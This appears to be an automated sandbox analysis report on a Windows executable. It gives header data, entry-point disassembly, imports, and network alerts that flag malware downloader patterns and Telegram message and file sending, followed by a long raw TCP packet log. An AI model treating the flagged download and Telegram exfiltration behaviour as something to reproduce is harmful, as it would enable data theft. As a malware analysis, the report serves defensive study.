                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..OP..*_...P...s...P...V...P..Rich.P..........PE..L....z.W.................d...........2............@
                                                                                                                                                            Icon Hash:b2b3aeb696aefe9e
                                                                                                                                                            Entrypoint:0x4032a0
                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                            Digitally signed:false
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                            Time Stamp:0x57017AB6 [Sun Apr 3 20:19:02 2016 UTC]
                                                                                                                                                            TLS Callbacks:
                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                            OS Version Major:4
                                                                                                                                                            OS Version Minor:0
                                                                                                                                                            File Version Major:4
                                                                                                                                                            File Version Minor:0
                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                            Import Hash:e2a592076b17ef8bfb48b7e03965a3fc
                                                                                                                                                            Instruction
                                                                                                                                                            sub esp, 000002D4h
                                                                                                                                                            push ebx
                                                                                                                                                            push esi
                                                                                                                                                            push edi
                                                                                                                                                            push 00000020h
                                                                                                                                                            pop edi
                                                                                                                                                            xor ebx, ebx
                                                                                                                                                            push 00008001h
                                                                                                                                                            mov dword ptr [esp+14h], ebx
                                                                                                                                                            mov dword ptr [esp+10h], 0040A2E0h
                                                                                                                                                            mov dword ptr [esp+1Ch], ebx
                                                                                                                                                            call dword ptr [004080B0h]
                                                                                                                                                            call dword ptr [004080ACh]
                                                                                                                                                            cmp ax, 00000006h
                                                                                                                                                            je 00007F0F493A50A3h
                                                                                                                                                            push ebx
                                                                                                                                                            call 00007F0F493A81E4h
                                                                                                                                                            cmp eax, ebx
                                                                                                                                                            je 00007F0F493A5099h
                                                                                                                                                            push 00000C00h
                                                                                                                                                            call eax
                                                                                                                                                            mov esi, 004082B8h
                                                                                                                                                            push esi
                                                                                                                                                            call 00007F0F493A815Eh
                                                                                                                                                            push esi
                                                                                                                                                            call dword ptr [0040815Ch]
                                                                                                                                                            lea esi, dword ptr [esi+eax+01h]
                                                                                                                                                            cmp byte ptr [esi], 00000000h
                                                                                                                                                            jne 00007F0F493A507Ch
                                                                                                                                                            push ebp
                                                                                                                                                            push 00000009h
                                                                                                                                                            call 00007F0F493A81B6h
                                                                                                                                                            push 00000007h
                                                                                                                                                            call 00007F0F493A81AFh
                                                                                                                                                            mov dword ptr [00434EE4h], eax
                                                                                                                                                            call dword ptr [0040803Ch]
                                                                                                                                                            push ebx
                                                                                                                                                            call dword ptr [004082A4h]
                                                                                                                                                            mov dword ptr [00434F98h], eax
                                                                                                                                                            push ebx
                                                                                                                                                            lea eax, dword ptr [esp+34h]
                                                                                                                                                            push 000002B4h
                                                                                                                                                            push eax
                                                                                                                                                            push ebx
                                                                                                                                                            push 0042B208h
                                                                                                                                                            call dword ptr [00408188h]
                                                                                                                                                            push 0040A2C8h
                                                                                                                                                            push 00433EE0h
                                                                                                                                                            call 00007F0F493A7D98h
                                                                                                                                                            call dword ptr [004080A8h]
                                                                                                                                                            mov ebp, 0043F000h
                                                                                                                                                            push eax
                                                                                                                                                            push ebp
                                                                                                                                                            call 00007F0F493A7D86h
                                                                                                                                                            push ebx
                                                                                                                                                            call dword ptr [00408174h]
                                                                                                                                                            add word ptr [eax], 0000h
                                                                                                                                                            Programming Language:
                                                                                                                                                            • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x86100xa0.rdata
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x530000x2f8e8.rsrc
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b4.rdata
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                            .text0x10000x637b0x6400967d0e18ece4b8dcc63ec9d544660136False0.671484375data6.484796945043301IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                            .rdata0x80000x14b00x1600d6b0bc2db2de2a3dd996fda6539cef0eFalse0.4401633522727273data5.033673390997287IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                            .data0xa0000x2afd80x6002aa587c909999ca52be17d0f1ffbd186False0.5188802083333334data4.039551377217298IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                            .ndata0x350000x1e0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                            .rsrc0x530000x2f8e80x2fa000d35228bed9e6f3e44cf465cb8cafb1cFalse0.35265440452755903data6.469094045775567IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                            RT_ICON0x533880x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States0.19277179699514965
                                                                                                                                                            RT_ICON0x63bb00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864EnglishUnited States0.21263401303342444
                                                                                                                                                            RT_ICON0x6d0580x74dcPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9871306324374917
                                                                                                                                                            RT_ICON0x745380x5488Device independent bitmap graphic, 72 x 144 x 32, image size 20736EnglishUnited States0.2557301293900185
                                                                                                                                                            RT_ICON0x799c00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishUnited States0.2701936702881436
                                                                                                                                                            RT_ICON0x7dbe80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.333298755186722
                                                                                                                                                            RT_ICON0x801900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States0.44183864915572235
                                                                                                                                                            RT_ICON0x812380x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304EnglishUnited States0.5352459016393443
                                                                                                                                                            RT_ICON0x81bc00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States0.6604609929078015
                                                                                                                                                            RT_DIALOG0x820280x100dataEnglishUnited States0.5234375
                                                                                                                                                            RT_DIALOG0x821280xf8dataEnglishUnited States0.6370967741935484
                                                                                                                                                            RT_DIALOG0x822200xa0dataEnglishUnited States0.6125
                                                                                                                                                            RT_DIALOG0x822c00x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                            RT_GROUP_ICON0x823200x84dataEnglishUnited States0.946969696969697
                                                                                                                                                            RT_VERSION0x823a80x1fcdataEnglishUnited States0.5413385826771654
                                                                                                                                                            RT_MANIFEST0x825a80x340XML 1.0 document, ASCII text, with very long lines (832), with no line terminatorsEnglishUnited States0.5540865384615384
                                                                                                                                                            DLLImport
                                                                                                                                                            KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, WaitForSingleObject, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GlobalUnlock, lstrcpynW, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                                                                            USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
                                                                                                                                                            GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                                                            SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                                                                                                            ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                                                                            COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                                            ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                                            EnglishUnited States
                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                            2025-01-11T00:07:28.723789+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1049978142.250.184.238443TCP
                                                                                                                                                            2025-01-11T00:07:33.507170+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049980132.226.247.7380TCP
                                                                                                                                                            2025-01-11T00:07:34.866831+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049980132.226.247.7380TCP
                                                                                                                                                            2025-01-11T00:07:35.434003+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049982104.21.16.1443TCP
                                                                                                                                                            2025-01-11T00:07:36.194675+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049983132.226.247.7380TCP
                                                                                                                                                            2025-01-11T00:07:36.802620+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049984104.21.16.1443TCP
                                                                                                                                                            2025-01-11T00:07:38.180425+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049986104.21.16.1443TCP
                                                                                                                                                            2025-01-11T00:07:39.500978+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049988104.21.16.1443TCP
                                                                                                                                                            2025-01-11T00:07:42.260446+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049992104.21.16.1443TCP
                                                                                                                                                            2025-01-11T00:07:44.901196+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049996104.21.16.1443TCP
                                                                                                                                                            2025-01-11T00:07:45.916213+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.1049997149.154.167.220443TCP
                                                                                                                                                            2025-01-11T00:08:03.369784+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.1049999149.154.167.220443TCP
                                                                                                                                                            2025-01-11T00:08:13.281560+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.1050001149.154.167.220443TCP
                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Jan 11, 2025 00:07:27.509321928 CET49978443192.168.2.10142.250.184.238
                                                                                                                                                            Jan 11, 2025 00:07:27.509427071 CET44349978142.250.184.238192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:27.509561062 CET49978443192.168.2.10142.250.184.238
                                                                                                                                                            Jan 11, 2025 00:07:27.519884109 CET49978443192.168.2.10142.250.184.238
                                                                                                                                                            Jan 11, 2025 00:07:27.519933939 CET44349978142.250.184.238192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:28.181372881 CET44349978142.250.184.238192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:28.181454897 CET49978443192.168.2.10142.250.184.238
                                                                                                                                                            Jan 11, 2025 00:07:28.182131052 CET44349978142.250.184.238192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:28.182179928 CET49978443192.168.2.10142.250.184.238
                                                                                                                                                            Jan 11, 2025 00:07:28.420636892 CET49978443192.168.2.10142.250.184.238
                                                                                                                                                            Jan 11, 2025 00:07:28.420669079 CET44349978142.250.184.238192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:28.421657085 CET44349978142.250.184.238192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:28.421742916 CET49978443192.168.2.10142.250.184.238
                                                                                                                                                            Jan 11, 2025 00:07:28.424221039 CET49978443192.168.2.10142.250.184.238
                                                                                                                                                            Jan 11, 2025 00:07:28.467341900 CET44349978142.250.184.238192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:28.723862886 CET44349978142.250.184.238192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:28.723992109 CET49978443192.168.2.10142.250.184.238
                                                                                                                                                            Jan 11, 2025 00:07:28.724083900 CET44349978142.250.184.238192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:28.724152088 CET49978443192.168.2.10142.250.184.238
                                                                                                                                                            Jan 11, 2025 00:07:28.724170923 CET44349978142.250.184.238192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:28.724203110 CET49978443192.168.2.10142.250.184.238
                                                                                                                                                            Jan 11, 2025 00:07:28.724232912 CET44349978142.250.184.238192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:28.724236965 CET49978443192.168.2.10142.250.184.238
                                                                                                                                                            Jan 11, 2025 00:07:28.724353075 CET49978443192.168.2.10142.250.184.238
                                                                                                                                                            Jan 11, 2025 00:07:28.753489971 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:28.753596067 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:28.753683090 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:28.754053116 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:28.754091024 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:29.416795015 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:29.416966915 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:29.420733929 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:29.420764923 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:29.421031952 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:29.421207905 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:29.421713114 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:29.463325024 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:31.897948027 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:31.898049116 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:31.904414892 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:31.904494047 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:31.916259050 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:31.916359901 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:31.916390896 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:31.916925907 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:31.922460079 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:31.924345970 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:31.990336895 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:31.990446091 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:31.990514994 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:31.990637064 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:31.990653992 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:31.990813971 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:31.994777918 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:31.994839907 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:31.994857073 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:31.994874001 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:31.994905949 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:31.994936943 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:31.994946957 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:31.996344090 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:31.999627113 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:31.999689102 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:31.999703884 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:31.999876976 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.006123066 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.006190062 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.006205082 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.006345034 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.012197018 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.012263060 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.012284040 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.012343884 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.018426895 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.018631935 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.018646955 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.018840075 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.024799109 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.024866104 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.024893045 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.025048971 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.030512094 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.030586958 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.030647039 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.030786991 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.036365032 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.036510944 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.036571026 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.036670923 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.042171001 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.042273045 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.042334080 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.042443991 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.047971964 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.048055887 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.056607008 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.056674957 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.056710958 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.056811094 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.082469940 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.082638025 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.082659960 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.082694054 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.082765102 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.087172031 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.087296009 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.087347984 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.087560892 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.087575912 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.087829113 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.091876984 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.091999054 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.092016935 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.092109919 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.092175961 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.092191935 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.092346907 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.092360020 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.092581034 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.096611023 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.096698046 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.096719027 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.096826077 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.096892118 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.096906900 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.097053051 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.101470947 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.101536036 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.101572990 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.101615906 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.101644993 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.104356050 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.104475975 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.108366013 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.108413935 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.109143019 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.112373114 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.112397909 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.113514900 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.113687992 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.113997936 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.114016056 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.114110947 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.118442059 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.118524075 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.118551016 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.118768930 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.123039007 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.123135090 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.123158932 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.123455048 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.127649069 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.127710104 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.127732038 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.128334045 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.132023096 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.132344007 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.132363081 CET44349979142.250.181.225192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.132402897 CET49979443192.168.2.10142.250.181.225
                                                                                                                                                            Jan 11, 2025 00:07:32.136190891 CET44349979142.250.181.225192.168.2.10
